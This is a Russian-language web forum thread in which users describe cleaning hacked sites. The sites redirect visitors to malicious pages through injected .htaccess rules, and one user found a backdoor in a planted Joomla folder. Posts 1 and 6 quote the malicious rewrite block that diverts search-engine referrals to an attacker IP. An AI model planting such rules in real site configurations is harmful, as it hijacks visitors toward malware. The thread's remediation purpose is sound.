|
Бесплатные PHP скрипты - форум техподдержки |
Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!
|
| Сегодня: 13.11.2024 - 22:04:24
Страницы: 1 Как вылечить перенаправление на вредоносные сайтыОбъявление - WR-Scriptы в UTF-8 кодировке |
---|
Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.
На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий! Планирую продолжить работы весь 2023 год.
|
Автор | Сообщение |
---|
Нина •
Н гость
|
Решила написать о недавнем взломе сайта моей знакомой. Звонит мне Ира, говорит, трафик (посещаемость) на ее сайте резко снизился, чуть ли не до нуля – нажимаешь на какие-то ссылки на сайте – открываются не нужные страницы – загружаются вредоносные сайты, появляются новые папки на хостинге в ее сайте – в общем - ужас какой-то.
Когда пользователи открывают ее сайт – их просят установить антивирус и говорят, что сайт заражен программами-шпионами.
Если щелкнуть на картинку-ссылку левой кнопкой и посмотреть путь на зараженном сайте – появляется не обычный путь размещения картинки, а строка вида –
http : / / spyware-software.info/0/go.php?sid=2
Нашли информацию – это взлом FTP (подобранный пароль, если он несложный) и файла .htaccess, который обычно находится на один уровень выше на хостинге, чем папка /public html. Нужно открыть Блокнотом файл .htaccess и удалить оттуда строки типа:
RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]
Сам файл .htaccess удалять не нужно. Даже если в нем после удаления вредоносного кода ничего нет. Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644». (Каждый может этот файл прочитать – но перезаписывать – только владелец сайта).
Мы поменяли пароль на FTP – выбрали самый сложный. Антивирус обновили, проверили компьютер. И не стали запоминать пароли в VC и Dreamweaver. Сайт полностью перезалили с резервной копии – сначала стираешь все файлы в папке /public html (папке хранения сайта – для форматирования), а потом записываешь все новые файлы с резервной копии. Сейчас все нормально. Я надеюсь, вы не забываете делать резервные копии вашего сайта? :)
| |
|
Сообщение # 1 |
27.04.09 - 13:49:39
| | Maksir •
M Участник форума
|
Нда.. однако.. =) Вирусы... Нина, есть операционные системы, в которых вирусы - не живут. Как вам такая новость? =) Да и программы там есть все необходимые для работы, бесплтано. Хотите офис, или для графики что-нибудь.. И платные есть, по мере необходимости, потребности. Драйверов ненужно никаких. Обновления системы делается легко, если рядом интернет. Даже кодеки на халяву без лишних телодвижений можно установить, все самое свежее, - одним кликом по мышке.
О правильном хостинге нужно заботиться в вашея говорю о профессиональном хостинге, который стоит на Unix. Все что работает на Unix, в Windows - всего лишь эмуляция. Вы изначально воспринимаете ОС такой, какая она есть. А, какая же она есть на самом деле? Вот вам подсовывают Windows и для вас "компьютер и вирус" это синоним.
Главное отличие Windows от Unix (и им подобным) состоит в том, что Windows не имеет разделений между процессами. Любой процесс задачи можно обойти любым другим процессом. Прав на файл у пользователей Windows вообще нет, а потому владельцем может быть кто угодно. В Unix - имеется жёская динамичная архитектура прав, которую никто никогда не отменял.
По этому, атрибуты типа -- 644 на Windows-сервере, это всего лишь эмуляция Unix. В то время, как в действительности, файловая система Windows не гарантирует того, какие атрибуты вы прописываете.
Цитата: Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644» |
Если этот файл ненужен, то его можно удалить. Он там ни к чему. Права 644 означают - чтение для всех групп пользователей и запись только для владельца. Можно сделать 400 , ошибки не будет, если ваш хостинг правильно отконфигурирован. Точка в начале файла означает, что это скрытый файл. В системе Unix все файлы и каталоги с такой точкой - невидимы для обычных пользователей, даже, если выставлен атрибут на чтение для всех, кто не является владельцем и в даже не включен в группу пользователей - абсолютные права для всех. | |
|
Сообщение # 2 |
27.04.09 - 18:35:21
| | Maksir •
M Участник форума
|
Умняка прокатил?
Ты вот скажи что, линукс может предложить карпарациям? Что линукс может предложить рабочим группам? Что линукс может предложить простым людям? а не заумным? И почему апачь делаеться под виндовс а iis под линукс не делаеться?
Да потому что виндовс лучше, в 10 тысячь раз!!! Его популярность говорит об этом. А вирусы пишуться теми кто пишет антивирусы, и линуксоидами обиженными на винду! | |
|
Сообщение # 3 |
16.08.09 - 22:11:18
| | Дмитрий •
Д Участник форума
|
Молодые люди!!! апаче под линуксом стоит, с тех когда линукс преобразился в графическою оболочку и работает на много быстрее чем виндоский апаче. Просто линукс сначала был чиста кровный сервер, аж потом со временем он отправился к людям. И зайти на сервер с под линукса на линукс не легко, а с под виндоса на сервер линус не возможно(файловая система разная), а вот с линукса на виндос(фунци есть для копирование виндоских разделов ) не составит труда для хакера который только учится. Хотя и говорят, что для взлома сайта не имеет значение, однако большинства серверов предпочитают линукс. А самая КРУТАЯ ОПЕРАЦИОННАЯ это которую на писал ты сам. И кто не согласен, пусть подумает хорошенько. | |
|
Сообщение # 4 |
07.09.09 - 02:30:11
|
| HawkDoom •
H Участник форума
|
Maksir, линуксоид обиженный на винду - тупой ламер. У каждой оси свои плюсы и надо использовать их на своё благо. В винде играть, в linux юзать сервера и т.д. - глупо говорить что какая то ось круче =)) А популярность винды говорит лишь о раскрутке манагерами корпорации своих продуктов, линукс же продукт в основном бесплатный и его популярность говорит лишь о его достоинствах. Я оч часто юзаю виндовс - в ней много сред разработки которые удобней чем в линукс. но серверная часть наоборот | |
|
Сообщение # 5 |
25.09.10 - 16:22:36
| | Виктор •
В Участник форума
|
Цитата:
RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]
|
была похожая проблема. Решил следующим образом:после полной проверки структуры сайта в папке components обнаружилась папка com_hello внутри которой нашелся свежий файл htaccess (этот же файл постоянно генерился и в папке \\имя_сайта.ru\htacsess). это был как признак того что искать надо внутри com_hello . и действительно при открытии файла joolog.php microsoft essentials заругалась на бэкдор. далее сравнил нужен ли этот com_hello с структурой квик старта и удалил. PS еще обратил внимание что папка com_hello образовалась здесь значительно позже чем все остальные. но при этом я сам в то время ничего на сайт не ставил. это тоже был признак что она добавлена искусственно. успехов! | |
|
Сообщение # 6 |
04.03.12 - 19:39:43
| | WR •
W Участник форума
|
Спасибо за информацию. Вирусов эксплоитов всяких сейчас расплодилось много... | |
|
Сообщение # 7 |
06.03.12 - 17:13:27
| | salomonof •
S Участник форума
|
А если покупать его на долго хватит?
________________________ http://www.brandprint.ru/faksimile/ | |
|
Сообщение # 8 |
11.03.13 - 14:31:47
| | WR •
W Участник форума
|
Недавно был и у меня завирусован файл .htaccess. Сразу же удалил вирусный файл и загрузил свой. Файл .htaccess у меня такой:
Код: DirectoryIndex index.php index.html AddDefaultCharset windows-1251 ExpiresActive on ExpiresDefault "access plus 0 seconds" ExpiresByType text/html "access plus 0 seconds" Options +FollowSymLinks ErrorDocument 404 /404.html
FileETag MTime Size <ifmodule mod_expires.c> <filesmatch ".(jpeg|jpg|gif|png|css|js)$"> ExpiresActive on ExpiresDefault "access plus 1 month" </filesmatch> </ifmodule>
Options All -Indexes
Deny from 208.177.76.25 Deny from 195.128.48.65 Deny from 198.245.58.7 Deny from 1.234.83.43
|
Если кому то интересно, то могу объяснить что означает каждая из команд | |
|
Сообщение # 9 |
12.01.14 - 17:58:48
| | Страницы: 1
|